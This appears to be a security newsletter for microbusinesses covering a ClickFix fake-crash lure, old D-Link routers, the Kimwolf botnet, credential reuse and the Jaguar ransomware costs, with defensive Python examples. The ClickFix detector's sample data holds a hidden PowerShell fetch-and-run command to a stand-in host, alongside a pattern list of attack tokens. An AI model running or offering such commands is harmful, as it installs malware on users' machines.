Security News for week of January 4th

ClickFix Update

There is a new version of ClickFix that is actively targeting businesses in the hospitality sector. A phishing email sends users to a fake Booking.com page that switches the browser into fullscreen mode without notice and then displays a fake Blue Screen of Death (BSOD). This makes it look as if the computer has crashed, and the fake BSOD then instructs the user to run a script to "fix" the system. The script is malicious, and running it installs malware. Two things give it away: a real crash screen never tells you to type or paste commands, and pressing Esc will usually drop a browser out of fullscreen, which a real crash screen cannot do.

ClickFix is a type of social engineering that tricks the user into running a malicious script, and it has grown in popularity over the last two years. ClickFix attacks started out being fairly easy to spot, but they are getting more sophisticated and harder to catch. Faking a BSOD is a new and more convincing twist. So even if you are not in hospitality, be on the lookout: this version of ClickFix can easily be adapted to target any industry.

You can read our article on ClickFix here, but all ClickFix attacks work the same way: the page silently copies a malicious command to the clipboard and then tricks the user into pasting and running it, either in the Windows Run dialog (Win+R) or in Terminal on macOS. So the easiest way to stay safe is to NEVER paste a command into Run or Terminal because a web page, pop-up, or email told you to. If anything or anyone asks you to do that, stop and reach out to someone you trust for assistance. Be extra suspicious at that point.
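If you suspect someone on a Windows machine already pasted a command into Run, the Run dialog keeps a history in the registry (the RunMRU key under the current user), and a ClickFix paste usually leaves its command there. The following is an added example, not code from the original article: it reads that history (on Windows) or a constructed sample (elsewhere) and flags entries that look like ClickFix payloads. The pattern list is an assumption chosen for illustration, not an authoritative signature.

```python
"""Flag ClickFix-style commands in Windows Run (Win+R) history.

Added example, not part of the original article. Explorer stores the
commands typed into the Run dialog under HKCU\\...\\Explorer\\RunMRU; a user
who fell for a ClickFix lure usually leaves the pasted command there.
"""
import re
import sys

# Where Explorer keeps Run-dialog history (per user). Values are named
# a, b, c, ... and hold the command followed by the two characters "\1".
RUNMRU_KEY = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

# Tokens commonly seen in the commands ClickFix lures ask victims to paste.
# Assumption for this example: a practical starting list, not a full signature.
SUSPICIOUS = [
    r"\bpowershell\b", r"\bpwsh\b", r"\bmshta\b", r"\bcmd(\.exe)?\s*/c\b",
    r"\bcurl\b", r"\bcertutil\b", r"\bbitsadmin\b", r"\brundll32\b",
    r"\biex\b", r"\birm\b", r"\binvoke-(expression|webrequest|restmethod)\b",
    r"-(enc|encodedcommand|e)\b", r"-w(indowstyle)?\s+hidden\b",
    r"\bexecutionpolicy\s+bypass\b", r"https?://", r"\bbase64\b",
]
_SUSPICIOUS_RE = re.compile("|".join(SUSPICIOUS), re.IGNORECASE)


def parse_runmru(values):
    """Turn raw RunMRU values into {name: command}.

    `values` maps value name -> raw string as read from the registry. The
    trailing "\\1" Explorer appends is stripped; the MRUList value only
    records ordering and is skipped.
    """
    commands = {}
    for name, raw in values.items():
        if name == "MRUList" or not isinstance(raw, str):
            continue
        commands[name] = raw[:-2] if raw.endswith("\\1") else raw
    return commands


def flag_suspicious(commands):
    """Return [(name, command, [matched tokens])] for entries worth a look."""
    flagged = []
    for name, cmd in commands.items():
        hits = sorted({m.group(0).lower() for m in _SUSPICIOUS_RE.finditer(cmd)})
        if hits:
            flagged.append((name, cmd, hits))
    return flagged


def read_runmru_windows():
    """Read the live RunMRU key. Works only on Windows (needs winreg)."""
    import winreg  # standard library, Windows only
    values = {}
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUNMRU_KEY) as key:
        index = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, index)
            except OSError:  # raised once there are no more values
                break
            values[name] = data
            index += 1
    return values


# Constructed sample in the layout RunMRU uses (not taken from a real machine).
# Entry "c" has the shape of a typical ClickFix paste; "a" and "b" are benign.
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\shared\\1",
    "c": "powershell -w hidden -ep bypass -c \"iex (irm https://example.test/fix)\"\\1",
}

if __name__ == "__main__":
    values = read_runmru_windows() if sys.platform == "win32" else SAMPLE_RUNMRU
    for name, cmd, hits in flag_suspicious(parse_runmru(values)):
        print(f"[{name}] {cmd}\n    matched: {', '.join(hits)}")
```

Run it as the user who may have been phished (RunMRU is per user). A flagged entry is a reason to treat the machine as compromised and get help, not proof on its own; an administrator running a legitimate PowerShell one-liner would also trip it. On macOS the equivalent trail is the shell history in the user's home directory.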

D-Link Router Vulnerabilities

It was revealed that cybercriminals are actively exploiting older D-Link wireless routers and modems, and D-Link says it has no plans to fix the devices, since they have reached their end of support. This is to be expected, since many of these routers are 15 years old or older, and yet enough of them are still in use to catch the attention of both hackers and security researchers. If you started your business after 2012 you are probably not affected, but most microbusiness owners do some work from home, and when was the last time you replaced your home router?

If you have an older D-Link router, check its model number against the list. Even if you are in the clear, this is a good time to check the routers at home and in the office to see whether they have reached end of support and, if they have, replace them. A router that no longer receives security updates is exposed to every flaw found after that date. If they are still supported, make sure they are running the latest firmware.

Kimwolf

Kimwolf is a botnet made up of smart devices and other IoT devices, especially third-party TV boxes, that recently broke the world record for traffic generated in a DDoS attack. Botnets are bad news for everyone, since they can be used to take services offline or to extort companies for large payouts.

But here is the thing: the botnet is made of ordinary people's internet-connected devices. So if you have IoT or smart devices in your house, there is a chance you are taking part in a botnet or residential proxy network without knowing it. For Kimwolf specifically, a security researcher has produced a tool that will show whether any identified part of the Kimwolf botnet is coming from your home or office IP address: https://Synthient.com/check. The site checks the IP address you are visiting from, so you will have to visit it once per network (once from home, once from the office). Also turn off your VPN first, since the IoT devices are not using it and the check would otherwise test the VPN provider's address rather than yours.

If your IP address is found, follow these remediation steps. If not, you can breathe a sigh of relief, but there are other residential proxy networks that may be using your smart or IoT devices, and you should follow these steps to protect yourself and others, since residential proxy networks use ordinary people's devices to commit cybercrime. Protect yourself and protect everyone else!

Older passwords, fresh attacks

Cybercriminals have been using usernames and passwords that have sat in criminal databases for several years to gain access to cloud-based file sharing and data storage. The credentials were originally stolen by infostealers installed via malvertising.

This suggests the victims lacked endpoint protection on their devices and had not changed their passwords in several years.

To avoid becoming a victim, install endpoint protection, use strong, unique passwords and MFA on your online accounts, and change the passwords for online accounts annually: email, file storage, or any application that stores data on the service provider's network. Passwords that are several years old or reused across sites are the ones to change first. Also check regularly at https://haveibeenpwned.com/ to see whether your accounts appear in published data breaches; there were several high-profile breaches at the end of 2025. If any of your accounts appear on haveibeenpwned, change that password right away.
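Have I Been Pwned also publishes a Pwned Passwords service that tells you whether a specific password has appeared in a breach without ever sending the password itself. The following is an added example, not code from the article or from Have I Been Pwned: it shows the k-anonymity lookup the service uses, in which only the first five hex characters of the password's SHA-1 hash leave your machine and the match is done locally against the list of suffixes the server returns. The offline stand-in response is constructed for this example (the suffix list is made up, apart from the one for "password"); the live call uses the real `https://api.pwnedpasswords.com/range/` endpoint.

```python
"""Check a password against Have I Been Pwned's Pwned Passwords range API.

Added example, not part of the original article. The API is k-anonymous:
only the first 5 hex characters of SHA-1(password) are sent; the server
returns every known suffix with that prefix and the match happens locally.
"""
import hashlib
import sys
import urllib.request

RANGE_URL = "https://api.pwnedpasswords.com/range/"


def sha1_upper(password):
    """Upper-case hex SHA-1 of the password, the form the API is keyed on."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


def split_hash(digest):
    """Return (5-char prefix sent to the API, 35-char suffix kept locally)."""
    return digest[:5], digest[5:]


def parse_range_response(text):
    """Parse 'SUFFIX:COUNT' lines into {suffix: count}; blank lines ignored."""
    counts = {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        suffix, _, count = line.partition(":")
        counts[suffix.upper()] = int(count)
    return counts


def fetch_range(prefix):
    """Live lookup over the network for one 5-character hash prefix."""
    req = urllib.request.Request(
        RANGE_URL + prefix,
        headers={"User-Agent": "pwned-password-check-example"},
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8")


def breach_count(password, fetch=fetch_range):
    """How many times the password appears in known breaches (0 = not found).

    `fetch` is injectable so the logic can run offline against a sample.
    The password never leaves this function; only the prefix is passed on.
    """
    prefix, suffix = split_hash(sha1_upper(password))
    return parse_range_response(fetch(prefix)).get(suffix, 0)


def constructed_range(prefix):
    """Offline stand-in for fetch_range, constructed for this example.

    It answers only for the prefix of the well-known weak password
    "password", listing it alongside two made-up suffixes in the API's
    line format; any other prefix gets an empty (no matches) response.
    """
    weak_prefix, weak_suffix = split_hash(sha1_upper("password"))
    if prefix != weak_prefix:
        return ""
    return "\n".join([
        "0018A45C4D1DEF81644B54AB7F969B88D65:1",
        f"{weak_suffix}:10000000",
        "011053FD0102E94D6AE2F8B83D76FAF94F6:5",
    ])


if __name__ == "__main__":
    # Usage: python pwned_check.py [password] [--live]
    args = [a for a in sys.argv[1:] if a != "--live"]
    candidate = args[0] if args else "password"
    source = fetch_range if "--live" in sys.argv else constructed_range
    n = breach_count(candidate, fetch=source)
    print("seen in breaches" if n else "not found", n, "time(s)")
```

A count of zero means the password is not in the published corpus, not that it is strong; a long, unique password that a manager generated will also come back zero. The real service can return padded entries with a count of 0 when asked to, which this code already treats as "not found".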


Jaguar got pwned

Jaguar Land Rover (JLR) learned in 2025 that skimping on cybersecurity can be expensive. In 2025 they were hammered by a ransomware attack that forced them to shut down production and lay off workers. They announced this week that the attack led to a 43% decline in third-quarter sales, and the total cost of the incident is now estimated at $220 million.

It is pretty clear that Jaguar did not invest adequately in security before this event and has paid dearly for it. They had to lay off workers for weeks, and the situation was so dire that they needed a £1.5 billion loan from the government to restart operations.

Microbusiness owners cannot expect a government bailout when their business gets hit by ransomware. Plan for a ransomware attack before one takes your business down: keep offline backups you have actually tested restoring from, and know how you would operate while your systems are being rebuilt.
